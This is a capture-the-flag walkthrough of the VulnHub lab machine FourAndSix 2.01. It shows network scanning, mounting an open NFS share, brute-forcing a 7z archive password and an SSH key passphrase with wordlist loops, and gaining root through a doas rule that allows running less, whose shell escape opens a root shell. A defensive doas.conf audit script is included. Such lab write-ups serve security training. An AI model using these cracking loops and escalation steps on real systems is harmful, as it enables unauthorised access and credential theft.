OSCP - Cracking FourAndSix 2.01

This post records my learning process while penetrating FourAndSix 2.01; the test VM comes from www.vulnhub.com
Blog series: OSCP cracking series for CTF
Download link: FourAndSix 2.01

2019-04-13 19:19:03 [Original post]

1. Official description

Name: FourAndSix: 2.01
Date release: 28 Oct 2018
Description: Task is to become root and read /root/flag.txt.

2. Walkthrough

We do not know the target IP at first, so we use netdiscover for host discovery

root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 300
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.
 10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
 10.10.10.76     00:0c:29:62:56:41      1      60  VMware, Inc.
 10.10.10.254    00:50:56:e0:63:df      1      60  VMware, Inc.

The target IP is 10.10.10.76; next we use nmap for port scanning
-Pn skips host discovery (no ping), since some hosts disable ICMP
-p- scans all ports, equivalent to -p 1-65535

root@kali:~# nmap -Pn -p- 10.10.10.76
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-14 01:28 EDT
Nmap scan report for 10.10.10.76
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
820/tcp  open  unknown
2049/tcp open  nfs
MAC Address: 00:0C:29:62:56:41 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 707.82 seconds

Surprisingly, an NFS service is exposed. NFS stands for Network File System.

# may need to install the client first: apt-get install nfs-common
root@kali:~# showmount -e 10.10.10.76
Export list for 10.10.10.76:
/home/user/storage (everyone)

One directory (/home/user/storage) is exported to everyone, so we mount it locally

root@kali:~# mount -t nfs 10.10.10.76:/home/user/storage ctf-nfs/
root@kali:~# cd ctf-nfs/
root@kali:~/ctf-nfs# ls
backup.7z
root@kali:~/ctf-nfs# 7z e backup.7z
Enter password (will not be echoed):
# extraction prompts for a password

Next we need to find the archive password

# Method 1
root@kali:~/ctf-nfs# rarcrack --thread 4 --type 7z backup.7z

# Method 2:
Path: https://github.com/exexute/PythonScaffold/blob/PythonScaffold_0.1/enum_violence/file_enum/7z-crack.sh
root@kali:~/ctf-nfs# cat 7z-crack.sh
# usage: ./7z-crack.sh <archive.7z> <wordlist>
# -y answers "yes" to overwrite prompts left by failed attempts; the wordlist is read from $2
while read -r line; do
    if 7z e -y "$1" -p"$line" >/dev/null 2>&1; then
        echo "FOUND PASSWORD: $line"
        break
    fi
done < "$2"

root@kali:~/ctf-nfs# chmod 777 7z-crack.sh
root@kali:~/ctf-nfs# ./7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt

# Method 3
Online cracking: https://www.lostmypass.com/

# Method 4
Path: https://github.com/koboi137/john/7z2john.pl
root@kali:~/ctf-nfs# git clone https://github.com/koboi137/john
root@kali:~/ctf-nfs/john-master# ./7z2john.pl ../backup.7z > ../backup.7z.hash
root@kali:~/ctf-nfs/john-master# john -w:/usr/share/wordlists/rockyou.txt ../backup.7z.hash

Whichever method is used, the result is the password: chocolate

root@kali:~/ctf-nfs# 7z e backup.7z
root@kali:~/ctf-nfs# ssh-keygen -l -f id_rsa.pub
2048 SHA256:BPl29YrxUBdBmLaG6K58UGlR0wruEBQE8vGOtrbXl8Y user@fourandsix2 (RSA)

It is an RSA key pair for SSH access. Logging in with the key still prompts for a passphrase, so another password has to be cracked

root@kali:~/ctf-nfs# ssh -i id_rsa user@10.10.10.76
# crack the key passphrase: -c (change comment) only succeeds when -P supplies the right passphrase
root@kali:~/ctf-nfs# cat /usr/share/wordlists/rockyou.txt | while read -r pass; do if ssh-keygen -c -C "user@forandsix" -P "$pass" -f id_rsa &>/dev/null; then echo "$pass"; break; fi; done

The passphrase is 12345678

root@kali:~/ctf-nfs# ssh -i id_rsa user@10.10.10.76
Enter passphrase for key 'id_rsa': 12345678
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114

fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)

Privilege escalation

fourandsix2$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chpass
/usr/bin/chsh
/usr/bin/doas
/usr/bin/lpr
/usr/bin/lprm
/usr/bin/passwd
/usr/bin/su
/usr/libexec/lockspool
/usr/libexec/ssh-keysign
/usr/sbin/authpf
/usr/sbin/authpf-noip
/usr/sbin/pppd
/usr/sbin/traceroute
/usr/sbin/traceroute6
/sbin/ping
/sbin/ping6
/sbin/shutdown
fourandsix2$

There is a program called /usr/bin/doas, which normally plays a role similar to sudo; we start here

fourandsix2$ cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

Run the permitted command to escalate privileges

fourandsix2$ doas /usr/bin/less /var/log/authlog

Press v to open the file in vi, then type :!sh to drop into a brand-new shell
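As an added example (not part of the original write-up or of doas itself), a small Python audit that parses doas.conf rules like the two above and flags the combination that made this box trivial: nopass, keepenv, and a root cmd that is an interactive program with a shell escape. The option list and the set of escape-capable programs are assumptions of this example, and setenv blocks are not parsed.

```python
import shlex

# Programs with a built-in shell escape (less: 'v' then ':!sh', as shown above).
# Assumption: a small, non-exhaustive list chosen for this example.
SHELL_ESCAPE_PROGRAMS = {"less", "more", "vi", "vim", "man"}
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}  # 'setenv {...}' not handled

# Constructed sample: the two /etc/doas.conf rules quoted in the write-up.
SAMPLE_DOAS_CONF = """\
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
"""

def parse_rule(line):
    """Parse one doas.conf rule into a dict; None for blank or comment lines."""
    tok = shlex.split(line.split("#", 1)[0])
    if not tok:
        return None
    rule = {"action": tok[0], "options": set(), "target": None, "cmd": None, "args": []}
    i = 1
    while i < len(tok) and tok[i] in OPTIONS:   # options come before the identity
        rule["options"].add(tok[i]); i += 1
    if i == len(tok):
        raise ValueError(f"rule without identity: {line!r}")
    rule["identity"], i = tok[i], i + 1         # user name or ':group'
    if i < len(tok) and tok[i] == "as":
        rule["target"], i = tok[i + 1], i + 2
    if i < len(tok) and tok[i] == "cmd":
        rule["cmd"], i = tok[i + 1], i + 2
    if i < len(tok) and tok[i] == "args":
        rule["args"] = tok[i + 1:]
    return rule

def audit(conf_text):
    """Return (line_no, finding) pairs for permit rules that hand out root unsafely."""
    findings = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        r = parse_rule(line)
        if (r is None or r["action"] != "permit" or r["identity"] == "root"
                or (r["target"] or "root") != "root"):   # target defaults to root
            continue
        prog = (r["cmd"] or "").rsplit("/", 1)[-1]
        if prog in SHELL_ESCAPE_PROGRAMS:
            findings.append((n, f"{prog} as root: its shell escape yields a root shell"))
        if "nopass" in r["options"]:
            findings.append((n, "nopass: root reached without authentication"))
        if "keepenv" in r["options"]:
            findings.append((n, "keepenv: caller environment reaches the root command"))
    return findings
```

Running `audit(SAMPLE_DOAS_CONF)` reports all three findings against the first rule and nothing against the root-to-root rule, which grants no extra privilege.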


Read the flag

fourandsix2# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
fourandsix2# cat /root/flag.txt
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#
